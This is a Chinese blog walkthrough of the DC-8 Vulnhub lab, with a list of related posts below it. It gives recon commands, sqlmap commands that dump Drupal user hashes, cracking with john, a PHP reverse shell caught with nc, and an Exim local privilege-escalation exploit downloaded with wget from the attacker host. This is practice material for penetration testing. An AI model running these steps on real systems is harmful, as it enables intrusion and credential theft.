DC-8通关教程

最新推荐文章于 2024-09-29 17:17:30 发布
最新推荐文章于 2024-09-29 17:17:30 发布
阅读量1.1k 收藏 18
点赞数 36
文章标签: 服务器 linux 网络 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/138136275
版权

一. 信息收集

1. 探测目标主机IP地址

arp-scan -l  //查看网段

vm  编辑--查看虚拟网络编辑器,看到靶机的网段

网段是: 192.168.83.0

是c段网络

2. 全面检测目标IP

nmap -sP 192.168.83.1/24

靶机ip是:

192.168.83.153

攻击机的ip是:

192.168.83.136

3.扫描端口

端口和服务是对应关系的根据计算机网络的应用层协议

nmap -p 1-65535 -A 192.168.83.153

80端口--http服务打开

22端口打开是ssh服务

访问页面

页面探测发现drupal7

4.目录扫描

dirsearch -u 192.168.83.153 -e * -x 403 --random-agent

二. 渗透过程

1. SQL注入

发现注入点

添加闭合方式报错

a.爆库

出现了SQL报错,接下来就上SQLmap跑了,爆一下数据库

sqlmap -u "http://192.168.83.153/?nid=1" --level=5 --risk=3 --batch --current-db //爆破当前数据库

数据库是: d7db

b.爆表

sqlmap -u "http://192.168.83.153/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -tables

有一堆表,但是有用的只有users,接着

c.爆字段名

sqlmap -u "http://192.168.83.153/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -columns

d.爆字段内容

sqlmap -u "http://192.168.83.153/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C'name,pass,uid' -dump

得到了两个用户,还有hash密文,我们建一个文件,将两个密文保存起来

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

2. 爆破密文

Drupal的hash密文是经过特殊加密的,用john进行爆破

john pd.txt

得到一个密码turtle

3. 反弹shell

测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码

在页面找到上传php代码的地方

nc -lvvp 6666

转换为交互式命令

python -c "import pty;pty.spawn('/bin/bash')"

SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险

    常用的SUID提权命令有:nmap、vim、find、bash、more、less、nano、cp等。

    sudo和SUID的区别

        sudo是给某个用户或者组授予执行某些命令的权限,权限在人身上

        SUID是给命令赋予root用户的权限,权限在命令上

4. 提权

找查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

这里试一下,先看一下版本

exim --version

版本是 4.89

接着找一下漏洞

searchsploit exim 4.89 

看到了可以提权的漏洞

Exim 4.87 - 4.91 - Local Privilege Escalation                                       | linux/local/46996.sh

复制一下文件

cp /usr/share/exploitdb/exploits/linux/local/46996.sh hack.sh

开启http服务

python -m http.server 8888

在DC-7中下载该文件,先跳到tmp目录

cd /tmp

wget 192.168.83.136:8888/hack.sh

可以看到文件是不可执行的,我们可以用chmod命令赋予执行权限

chmod 777 hack.sh

5. 找查flag

在root目录下发现flag文件

小春学渗透
关注
密码存储的三种方法
追风
06-19 5070
      保存密码的方法基本有三种,各种方法在安全性以及开发人员、管理员和用户易用性之间有着不同的均衡:      1.对于开发人员和管理者来说,最简单的方法是把密码以普通文本的方式保存在数据库字段。这对用户也是很方便的,因为当用户遗失密码时可以交密码通过E-mail发送给用户。然而这种方法的安全性最低,因为所有的密码保存为普通文本,如果数据库受到黑客攻击,黑客很容易获得每个用户的密码。因
DC8靶机】
qq_40646572的博客
05-13 393
信息收集 开启dc8靶机 使用nmap扫描下当前网段。发现存在dc8靶机192.168.85.139主机。且主机开启了22端口以及80端口。 打开http服务。 web——getshell 经过测试,在home页面,点击侧边栏,存在nid参数,经过测试该处存在sql注入点。 经过测试,当前数据表存在一个字段。 使用联合注入的方式获取到当前数据库名,d7db。 获取当前数据库的表个信息。看到当前数据库存在users数据表格。 Payload= nid=-1 union select gr
DC-4通关教程
m0_74402888的博客
04-24 2069
6默认的shell:这个字段指定了用户的默认shell,即用户登录后用来执行命令的程序。在Linux系统,/etc/passwd是一个重要的系统用户配置文件,用于存储系统所有用户的基本信息。在Linux,/usr/bin目录主要用于存放用户可执行的二进制文件,即用户可以直接执行的程序。火狐浏览器打开网页,用自带的扩展“wappalyzer”查看页面的一些信息,cms,js版本,和php信息,发现没有可用的信息,5家目录:这个字段指定了用户的家目录,即用户登录后所处的目录。用户可以属于多个组。
DC-5通关教程
m0_74402888的博客
04-25 1054
具体来说,这个命令在文件系统的根目录(/)开始,查找所有设置了setuid位(set user ID on execution)的文件,并将这些文件的路径打印出来。可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞。编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容。刷新后页面内容会发生变化,可能存在文件包涵,这个是一个突破口。
DC-8靶机渗透测试详细教程
啊醒的博客
05-04 2027
DC-8靶机渗透测试详细教程
DC-2通关教程
2401_83876878的博客
09-26 991
DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。5. 发现不能访问,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt。wpscan --url http://dc-2 --enumerate u 枚举用户。登录后台之后,我们看到flag2,我用的是jerry的账号。
DC-3通关教程
m0_74402888的博客
04-23 824
利用John(john 设置为使用特定的哈希格式进行破解,有多种方法可以做到对哈希类型进行识别)工具,对该密码进行爆破拆解。接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。joomscan是一款开源的且针对joomla的扫描器,kali可以用命令。searchsploit是一款kali自带的搜索漏洞信息的模块。
Dc-2通关教程
最新发布
2402_84645634的博客
09-29 618
DC-2从环境搭建到通关教程
DC-6通关教程
m0_74402888的博客
04-25 916
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3040
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
WEB-CTF通关教程
m0_50098640的博客
08-01 584
信息泄露的第二关 进去页面如下 查看源代码发现后缀为.sql的文件。 看见这个文件思路就是把这个文件下载下来查看敏感数据。尝试在链接后直接加文件名,发现直接下载了我们的文件。 使用记事本打开文件,得到flag值。 暴力破解第二关 打开页面提示如下, 点击地址传送门得到如下链接 将链接的UID使用在线base64解码得到的结果如下 看到这明白了解这个题的思路,抓包爆破UID值。从T_1到T_5000,思路有了,可是具体爆破的时候不知道怎么爆破,等知道怎么解决这个问题了之后再来更。 xss第二关
【xss-labs靶场实战通关教程
AuroraMiraitowa的博客
03-09 1125
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
【智能交互】OPPO接入小布语音技能通关教程:个人开发者实现接口调用
C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
07-19 3133
适用人群:本教程适合大赛接入小布语音技能的同学以及初次使用小布助手的开发者本篇文章是博主弄了多次测试才勉强弄明白的,OPPO的开发文档和没有没啥区别很多人会问:“为啥有更成熟的其他语音技能平台放着不用?答:“因为我在参加的比赛是由oppo主办方举办的,若要想进决赛,必须要接入OPPO开放平台”猜想测试部分和实际操作部分,请根据你的需要进行跳过选择。
OVerTheWire:NATAS通关0-20
friutUncil的博客
09-30 1099
LV0 natas将是一些服务端的安全基础知识,ok,试一下吧 You can find the password for the next level on this page. 打开就是这句话,在此页能找到密码,但是找不到呀,那就看下源码吧 F12 再注释里找到密码 The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto LV...
awk 切割字符串 shell linux
abc
09-24 393
shell linux awk 切割字符串。
FTP 服务器 linux安装
weixin_45368812的博客
09-25 1080
ftp 连接失败:500 OOPS: vsftpd: refusing to run with writable root inside chroot()ftp 连接失败:530 permission deniedftp 连接成功,但是能访问到上级目录和其他目录提示:以下是本篇文章正文内容,下面案例可供参考注意: 以下全部操作都是基于 SELinux= disable、防火墙关闭。
Linux-L14-Linux把用户加入到管理者root
禅:戒定慧
09-25 539
将普通用户添加到root组
Linux 文件目录结构(详细)
2301_80035882的博客
09-26 432
Linux的文件系统是采用级层式的树状目录结构,在此结构的最上层是根目录“/”,然后在此目录下再创建其他的目录。Linux世界,一切皆文件!
matlab2021abuck dc-dc仿真实验教程
11-02
MATLAB是一种强大的编程和仿真软件,可以广泛应用于各种领域的科学和工程问题。其MATLAB 2021a版本引入了新的功能和工具,包括模拟直流-直流(DC-DC)变换器的能力。 DC-DC变换器是一种电力转换设备,用于将一个直流电压转换为另一个直流电压。在MATLAB 2021a版本,新的仿真实验教程“ABuck DC-DC”提供了学习和理解DC-DC变换器工作原理的示例。 该实验教程通过使用MATLAB的仿真环境来模拟和分析ABuck DC-DC变换器的性能。学习者将学会如何建立变换器的模型,定义电路参数和控制策略,并使用MATLAB的仿真工具来评估电路的性能。 实验教程提供了逐步的说明和示例代码,使学习者能够按照指导一步一步地完成仿真实验。学习者将学会如何分析电路的电压、电流和功率等关键参数,并通过改变控制策略来优化性能。 通过完成这个实验教程,学习者将获得以下技能和知识: 1. 了解DC-DC变换器的基本原理和工作方式; 2. 学会使用MATLAB建立DC-DC变换器的仿真模型; 3. 学会分析和评估电路的性能,如电压波形、电流波形和功率效率等; 4. 学会设计和优化DC-DC变换器的控制策略。 总之,MATLAB 2021a版本的ABuck DC-DC仿真实验教程提供了一个学习和理解DC-DC变换器的绝佳机会。通过完成这个实验教程,学习者能够熟练使用MATLAB的仿真工具,并具备设计和优化DC-DC变换器的能力。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值